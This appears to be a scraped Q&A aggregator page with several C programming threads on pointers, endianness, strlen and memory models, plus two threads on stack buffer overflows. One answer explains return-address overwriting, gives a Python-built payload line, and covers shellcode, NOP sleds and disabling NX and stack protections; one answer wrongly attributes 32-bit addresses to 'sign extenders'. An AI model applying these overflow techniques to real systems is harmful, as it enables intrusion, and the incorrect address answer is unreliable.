C Buffer overflow - Return address not expressible in ASCII

C Buffer overflow - Return address not expressible in ASCII - c

I'm trying to overflow a buffer of 64bytes.
The buffer is being filled by a call to gets
My understanding is that I need to write a total of 65 bytes to fill the buffer, and then write another 4 bytes to fill the stack frame pointer.
The next 4 bytes should overwrite the return address.
However, the address that I wish to write is 804846A.
Is this same as 0x0804846A? If so, I'm finding it hard to enter 04 (^D)
Should this be entered in reverse order? (6A 84 04 08)?
Some initial experiments that I was running with input being ZZZZZ..(64 times)..AAAABBBB
ended up making the ebp register to be 0x42414141
The architecture in question is x86.
update: I managed to get ASCII codes 0x04 and 0x08 working. The issue seems to be with 0x84. I tried copying the symbol corresponding to 0x84 from http://www.ascii-code.com which is apparently „. However, C seems to resolve this symbol into a representation greater than 1 byte.
I also tried to use ä as mentioned in http://www.theasciicode.com.ar
This also resulted in a representation greater than 1 byte.

You seem to be depending on implementation details of a particular compiler and CPU architecture. For example:
Not all CPU architectures use a frame pointer at all.
Endianness varies across different CPUs, and this would affect whether you need to "reverse" the bytes or not.
Where the stack metainformation (the frame pointer, etc.) is located with respect to a given local variable will differ between compilers, and even between the same compiler using different optimization options.

Related

What's the difference between these pointer dereferencements

This is the kind of questions where you are sure it is a duplicate but you need to ask. I don't know the terminology so I don't know what to search for, I'm just asking for the right terminology based on the example I give.
Can someone explain me the difference (well, even just the correct terminology and I can google the difference myself) between these 2:
UINT32 v32;
UINT32* v32_ptr = &v32;
UINT16 v16_1 = *(UINT16*)v32_ptr; // Version 1 of dereferencement
UINT16 v16_2 = (UINT16)*v32_ptr; // Version 2 of dereferencement
The result is the same, but what about the use cases?

In the first case, you are casting a 32bit pointer to a 16bit pointer and dereferencing that. In the second case you are dereferencing a 32bit pointer.
In both situations, you are assigning to a 16bit variable.
The results are not always the same, it depends on the architecture endian-ness. In other words, if the architecture is little-endian, then the two 16bit variables should be equal over the entire range of values that the source can take. But if the architecture is big-endian, the values will often be different.
EDIT
In light of your question in the comments below, I thought an example would be helpful here.
Consider the following and pretend the architecture can choose which endian it likes. Also, let's use the value 0x4241, and have the process write it out 4 times alternating big/little-endian, the first two times as UINT32 and the last two times as UINT16.
address data
0xABCD0000 00 00 42 41 // big-endian, UINT32, value 0x4242
0xABCD0004 41 42 00 00 // little-endian
0xABCD0008 42 41 // big-endian UINT16
0xABCD000A 41 42 // little-endian UINT16
The last two are to help visualize the differences.
When we set v32_ptr to the address of v32 it receives the memory address 0xABCD0000 (for example). The value is layed out BE in memory. If we cast v32_ptr to a (UINT16*), the memory address does not change, but now only the first two bytes are used. Dereferencing that pointer as a 16bit pointer would yield 0. But dereferencing it as a 32bit ptr would yield the result 0x4241.
Now do the same with the little-endian variables. Here our memory addresses are 0xABCD0004 and 0xABCD000A. Setting v32_ptr to 0xABCD0004, and dereferencing it as a (UINT16*)(LE) you get the value 0x4241. That is the same value you would get if you dereferenced a 16bit-LE pointer (like at address 0xABCD000A).
Both casts will truncate the 32bit original value, but I hope you can see now the difference.
Lastly
This information has application in network programming, embedded systems, and peer-to-peer and client-server protocols. Little-endian is almost universal, but there are still system that are BE. Also, some older network protocols explicitly chose to use BE. And, a specific application of your example could be to test the endian-ness of the system you are running on (for portable source code). I.e., set v32 = 0x4241, then after dereferencing both ways, if v16_1 and v16_2 are the same (they both equal 0x4241), then the system is LE, but if they are different (one yields 0x4241 and the other yields 0), then the system is BE.

Why is some file pointer have 28-bit address on a 64-bit OS?

I'm a novice on programming and there are one unimportant but confusing problem that bothers me.
Let me post my code first:
FILE *fp;
int i;
fp=fopen("test_data.txt", "r");
printf("i's address=%p\n", &i);
printf("fp's address =%p\n", fp);
printf("stdout's address=%p\n", stdout);
close(fp);
The output is:
i's address=0x7ffd038ab8cc
fp's address=0x231c010
stdout's address=0x7fbb2e4f7980
My problem is that why is the fp's address 28-bit? Shouldn't it be the same as normal variables and standard output (48-bit)?
I use GCC on 64-bit Ubuntu Linux.
Thanks for your answers!

The most likely case here is that your file adress simply starts with zeros, which are omitted by default.
Edit: Here is a question that points to a similar kind of problem.

fopen is likely to call malloc to get its FILE* handle.
And some implementations of malloc are allocating "small" objects and "large" objects differently - in different address space segments (obtained with mmap(2) or some other system call, listed in syscalls(2)...)
On some implementations, stdout is a pointer to some static data...
Also, you probably have ASLR enabled...
You might investigate by using pmap(1) on your running process. See also proc(5); if you have time to spare, read sequentially lines from /proc/self/maps inside your program, and copy them to stdout ; try also cat /proc/$$/maps to understand what is your shell's virtual address space.
You could also strace(1) your program to understand the many system calls it is doing....
But you really should not bother. From a C perspective, addresses are more or less random (unless you dive into implementation details)
(On some x86-64 processors, there are really only 48 bits of address, with the highest 16 bits all zeros or all ones.)

As you may known the address of all variables,pointers are normally stored in Hexadecimal format.
If you directly convert 0x231c010(base 16) you get something like 0000 0010 0011 0001 1100 0000 0001 0000(base 2)
The conversion gives you a 32 bit value.
If you are familiar with the architecture of a computer you may know that all datapath(used to transfer data between various components inside a computer like ram to processor etc) use a device called "Sign Extender".
The C compiler actually produces only 32 bit values but these sign extender add extra 0's to it make it into 64 bit so the processor can work on it. After the processing is over the program gives you the 32 bit address even if you have a 64 bit OS. Unless you use a native 64 bit application(not a 64 bit compatable one) you will always get a 32 bit address.

vectorized strlen getting away with reading unallocated memory

While studying OSX 10.9.4's implementation of strlen, I notice that it always compares a chunk of 16-bytes and skips ahead to the following 16-bytes until it encounters a '\0'. The relevant part:
3de0: 48 83 c7 10 add $0x10,%rdi
3de4: 66 0f ef c0 pxor %xmm0,%xmm0
3de8: 66 0f 74 07 pcmpeqb (%rdi),%xmm0
3dec: 66 0f d7 f0 pmovmskb %xmm0,%esi
3df0: 85 f6 test %esi,%esi
3df2: 74 ec je 3de0 <__platform_strlen+0x40>
0x10 is 16 bytes in hex.
When I saw that, I was wondering: this memory could just as well not be allocated. If I had allocated a C string of 20 bytes and passed it to strlen, it would read 36 bytes of memory. Why is it allowed to do that? I started looking and found How dangerous is it to access an array out of bounds?
Which confirmed that it's definitely not always a good thing, unallocated memory might be unmapped, for example. Yet, there must be something that makes this work. Some of my hypotheses:
OSX not only guarantees that its allocations are 16-byte aligned, but also that the "quantum" of an allocated is a 16-byte chunks. Said another way, allocating 5 bytes will actually allocate 16 bytes. Allocating 20 bytes will actually allocate 32 bytes.
It's not harmful per se to read of the end of an array when you're writing asm, as it's not undefined behaviour, as long as its within bounds (within a page?).
What's the actual reason?
EDIT: just found Why I'm getting read and write permission on unallocated memory?, which seems to indicate my first guess was right.
EDIT 2: Stupidly enough, I had forgotten that even though Apple seems to have removed the source of most of its asm implementations (Where did OSX's x86-64 assembly libc routines go?), it left strlen: http://www.opensource.apple.com/source/Libc/Libc-997.90.3/x86_64/string/strlen.s
In the comments we find:
// returns the length of the string s (i.e. the distance in bytes from
// s to the first NUL byte following s). We look for NUL bytes using
// pcmpeqb on 16-byte aligned blocks. Although this may read past the
// end of the string, because all access is aligned, it will never
// read past the end of the string across a page boundary, or even
// accross a cacheline.
EDIT: I honestly think all answerers deserved an accepted answer, and basically all contained the information necessary to understand the issue. So I went for the answer of the person that had the least reputation.

I'm the author of the routine in question.
As some others have said, the key thing is that the reads are all aligned. While reading outside the bounds of an array is undefined behavior in C, we're not writing C; we know lots of details of the x86 architecture beyond what the C abstract machine defines.
In particular, reads beyond the end of a buffer are safe (meaning they cannot produce a trap or other observable side effect) so long as they do not cross a page boundary (because memory attributes and mappings are tracked at page granularity). Since the smallest supported page size is 4096 bytes, an aligned 16 byte load cannot cross a page boundary.

Reading memory on most architectures only has a side effect if the address being read corresponds to a page that is not mapped. Most strlen implementations for modern computers try to do only aligned reads of however-many bytes. They will never do a 16-byte read straddling two pages, and so they will never elicit any side effect. So it's cool.

How malloc aligns stuff is irrelevant, since the programmer may allocate a string inside a block. A simple example is a struct that has an embedded char array:
struct Foo
{
int bar;
char baz[10];
};
If you allocate an instance of this struct, it will take up 16 bytes, but baz will start at offset 4. Thus if you read 16 bytes from there, you will cross into the next 16 byte chunk that you don't own. If you are unlucky, that may lie in the next page and trigger a fault.
Also, strings don't have to be in the heap at all, such as constants that are in read-only data section. strlen must work in all cases.
I assume the strlen function first processes the initial portion of the string until it's 16 byte aligned (this code has been omitted from the question) and then proceeds in 16 byte chunks. As such, the actual reason this works is reason #2: you won't cross a page boundary which is the granularity of access checking by the processor.

Allocating Small Memory Blocks Using Malloc
...
When allocating any small blocks of memory, remember that the granularity for blocks allocated by the malloc library is 16 bytes. Thus, the smallest block of memory you can allocate is 16 bytes and any blocks larger than that are a multiple of 16. For example, if you call malloc and ask for 4 bytes, it returns a block whose size is 16 bytes; if you request 24 bytes, it returns a block whose size is 32 bytes. Because of this granularity, you should design your data structures carefully and try to make them multiples of 16 bytes whenever possible.
For the record, referencing (reading) past allocation could trigger a page fault if you cross a page boundary. This is how guardmalloc works:
Each malloc allocation is placed on its own virtual memory page (or pages). By default, the returned address for the allocation is positioned such that the end of the allocated buffer is at the end of the last page, and the next page after that is kept unallocated. Thus, accesses beyond the end of the buffer cause a bad access error immediately.
Also read the vectorized instructions explicit reference in the same page:
As of Mac OS X 10.5, libgmalloc aligns the start of allocated buffers on 16-byte boundaries by default, to allow proper use of vector instructions (e.g., SSE). (The use of vector instructions is common, including in some Mac OS X system libraries.
ps. afaik NSObject and friends share the heap implementation with malloc

Note that it is an aligned read (implied by it being part of a non-vex-encoded instruction that isn't explicitly an unaligned read). That means that while it may (and often does) read beyond the end of the string, it will always stay on a page that the string is on.

How are addresses resolved by a compiler in a medium memory model?

I'm new to programming small/medium memory models CPUs. I am working with an embedded processor that has 256KB of flash code space contained in addresses 0x00000 to 0x3FFFF, and with 20KB of RAM contained in addresses 0xF0000 to 0xFFFFF. There are compiler options to choose between small, medium, or large memory models. I have medium selected. My question is, how does the compiler differentiate between a code/flash address and a RAM address?
Take for example I have a 1 byte variable at RAM address 10, and I have a const variable at the real address 10. I did something like:
value = *((unsigned char *)10);
How would the compiler choose between the real address 10 or the (virtual?) address 10. I suppose if I wanted to specify the value at real address 10 I would use:
value = *((const unsigned char *)10);
?
Also, can you explain the following code which I believe is related to the answer:
uint32_t var32; // 32 bit unsigned integer.
unsigned char *ptr; // 2 byte pointer.
ptr = (unsigned char *)5;
var32 = (uint32_t)ptr;
printf("%lu", var32)
The code prints 983045 (0xf0005 hex). It seems unrealistic, how can a 16 bit variable return a value greater than what 16 bits can store?

Read your compiler's documentation to find out details about each memory model.
It may have various sorts of pointer, e.g. char near * being 2-byte, and char far * being 4-byte. Alternatively (or as well as), it might have instructions for changing code pages which you'd have to manually invoke.
how can a 16 bit variable return a value greater than what 16 bits can store?
It can't. Your code converts the pointer to a 32-bit int. , and 0xF0005 can fit in a 32-bit int. Based on your description, I'd guess that char * is only pointing to the data area, and you would use a different sort of pointer to point to the code area.

I tried to comment on Matt's answer but my comment was too long, and I think it might be an answer, so here's my comment:
I think this is an answer, I'm really looking for more details though. I've read the manual but it doesn't have much information on the topic. You are right, the compiler has near/far keywords you can use to manually specify the address (type?). I guess the C compiler knows if a variable is a near or far pointer, and if it's a near pointer it generates instructions that map the 2 byte near pointer to a real address; and these generated mapping instructions are opaque to the C programmer. That would be my only guess. This is why the pointer returns a value greater than its 16 bit value; the compiler is mapping the address to an absolute address before it stores the value in var32. This is possible because 1) the RAM addresses begin at 0xF0000 and end at 0xFFFFF, so you can always map a near address to its absolute address by or'ing the address with 0xF0000, and 2) there is no overlap between a code (far) pointer and a near pointer or'd with 0xF0000. Can anyone confirm?

My first take would be read the documentation, however as I had seen, it was already done.
So my assumption would be that you somehow got to work for example on a large existing codebase which was developed with a not too widely supported compiler on a not too well known architecture.
In such a case (after all my attempts with acquiring proper documentation failed) my take would be generating assembler outputs for test programs, and analysing those. I did this a while ago, so it is not from thin air (it was a 8051 PL/M compiler running on an MDS-70, which was emulated by a DOS based emulator from the late 80s, for which DOS was emulated by DOSBox - yes, and for the huge codebase we needed to maintain we couldn't get around this mess).
So build simple programs which would do something with some pointers, compile those without optimizations to assembly (or request an assembly dump, whatever the compiler can do for you), and understand the output. Try to cover all pointer types and memory models you know of in your compiler. It will clarify what is happening, and hopefully the existing documentations will also help once you understand their gaps this way. Finally, don't stop at understanding just enough for the immediate problem, try to document the gaps properly, so later you won't need to redo the experiments to figure out things you once almost done.

Create buffer overflows in snow leopard

As part of a course at university in computer security, I'm soon about to learn about buffer overflows and how to use them to as exploits. I'm trying to do some simple buffer overflow with the following code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer_one[4], buffer_two[16];
strcpy(buffer_one, "one");
strcpy(buffer_two, "two");
strcpy(buffer_one, argv[1]);
printf("buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
}
I'm able to overwrite the content of buffer_one with the null terminator if i run
$./overflow 1234567890123456
buffer_two is at 0x7fff5fbff8d0 and contains '1234567890123456'
buffer_one is at 0x7fff5fbff8e0 and contains ''
But if i send more than 16 characters as argument, the program sends Abort trap. I supposed this is some sort of buffer protection on Snow Leopard (ASLR maybe?). If if make the size of buffer_two < 16, the adresse is still 16 bits apart
I'm running gcc -o overflow overflow.c -fno-stack-protector to remove stack protection
Is there any solution to this problem, other than installing a VM running a linux dist.?

The key to why this is happening is the fact that buffer_one is located after buffer_two in memory. This means that when you overflow buffer_one, you are not overflowing into buffer_two. Instead you are overflowing into stack memory being used to hold other things, such as the saved ebp pointer and most importantly, the return address.
And this is exactly what you want to happen when attempting a buffer overflow exploit! When the program executes strcpy(buffer_one, argv[1]); the first four bytes from argv[1] go into the memory allocated for buffer_one. But then the next 12 start overflowing memory being used for other things, eventually overwriting the return address. Without seeing the machine code, I can't say for sure which bytes exactly are overflowing the return address. But I'm guessing the value of EIP at the time of the SIGABRT is 0x31323334 or something similar (hex representation of '1234'). The key is realizing that by being able to overwrite the return address, you control EIP. And when you control EIP, you control the system. (somewhat overexaggerated, but in most cases not far off) When you control EIP, you control which instructions the processor will execute next (putting aside for the moment the fact that the OS/kernel actually stand in between).
Now if you find exactly which eight bytes overwrite the return address you can replace those bytes with the address of your buffer (0x00007fff5fbff8e0) and instead of returning to the original caller (libc in this case), the program will start executing the instructions you provided (AKA the shellcode). Note that you will have to fill in the implied 0s in the most significant places and provide the address as the actual nonprintable ASCII characters (0x00 0x00 0x7f 0xff 0x5f and so on), not the actual digits/characters 7ff5 etc. If using an x86-64 architecture, you'll also have to take the little-endianness into account and supply it backwards -- 0xe0 0xf8 0xbf etc. Supplying these nonprintable characters is most easily accomplished using backticks and command substitution using a brief Python or Perl script:
./overflow `python -c 'print "AAAAAAAAAAAAAAAA\xe0\xf8\xbf\x5f\xff\x7f"'`
(The A's are padding to overflow the buffer.) Unfortunately, you won't be able to provide the 2 additional \x00 needed for the address. One of these NULLs will be placed there for you by strcpy, but you'll have to get lucky with the last NULL and hope the address you're overwriting already started with 0x00 (which is actually highly likely). Now when you execute this with the right number of A's, you'll probably still get a segmentation fault or even possibly illegal instruction, since you'll now jump to the capital A's and execute them as actual machine instructions (0x41 => inc ecx).
Then finally the last piece is putting in the actual shellcode. Given your limited buffer sizes, it will be very hard to provide anything useful in only 12 bytes or so. Since you are writing the code in this case, the easiest thing will probably be to make your buffer bigger. If this weren't an option, then you could either A) use buffer_two as well for 16 more bytes since it comes before buffer_one or B) provide the shellcode in an environment variable and jump to that instead.
If you wish to write the actual shellcode yourself, you'll have to know how to perform syscalls and what calling conventions are and how to use them, as well as how to avoid NULL bytes in the shellcode. The other alternative is to use a payload generator such as the one included with Metasploit which will make it a lot easier (although you won't learn nearly as much).
These are technically the only pieces you need, especially since you have a good idea of what the address will be. However, many times (especially when the shellcode address is not known) a so-called NOP sled will be placed in front of the shellcode so that you don't have to get the address exactly right. A NOP sled (short for No Operation) is simply hundreds to thousands of NOP instructions (0x90) that you can jump into the middle of and then have no effect until execution continues into the shellcode.
If you trace everything in GDB and execution jumps to the shellcode correctly but you still get access violations, it's likely because the NX bit is set on the stack page, meaning that the processor will refuse to execute data on from the stack as instructions. I'm not sure if execstack is included with OSX or not, but if so, you can use it for testing purposes to disable the NX bit (execstack -s overflow).
I apologize for the wall of text, but I wasn't sure how far you wanted to go studying buffer overflows. There's other guides you can check out as well, such as Aleph One's archetypal guide, "Smashing the Stack for Fun and Profit". The Shellcoder's Handbook is a good book to check out as well, and I'm sure others can add recommendations.
TL;DR: In short, you are overflowing your buffer and overwriting saved pointers and return addresses with garbage.

If you are learning about exploits then you'll need to really dig into details.
Go ahead, read the machine code! You might be able to find out how to slip the overflow past whatever check method Snow Leopard is using.
The problem may be simpler than that too. There's no rule that the compiler has to put buffer_one and buffer_two in any particular order on the stack or even put them on the stack at all. Notice that buffer_one would actually fit into a register.
That isn't the case here of course, but I see that buffer_two is placed before buffer_one. That means that writing an overflow into buffer_one will never write into buffer_two. I can't explain why it ends up containing '', but f8d0 is definitely before f8e0 in memory.

Data on the stack on x86 is 4-byte aligned. There is padding placed between buffer_two and buffer_one if buffer_two length is not a multiple of 4 bytes. change it to 12 or less and they should be 12 bytes apart, etc.
[Update] I overlooked the address size. You are on a 64-bit system, your stack is 8-byte aligned. The address differences won't change until your buffer size changes by at least 8 bytes.
Is this line correct:
strcpy(buffer_one, argv[1]);
The output looks like you are copying argv[1] into buffer_two.
Given that case, how much are you copying when it crashes? 17 bytes? 18? If it is more than 24 you will start clobbering the stack in ways which would lead to the abort.
Note that "1234567890123456" is actually copying 17 bytes which includes the null terminator truncating buffer_one.

Have you tried to disable FORTIFY_SOURCE when compiling?
-D_FORTIFY_SOURCE=0

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight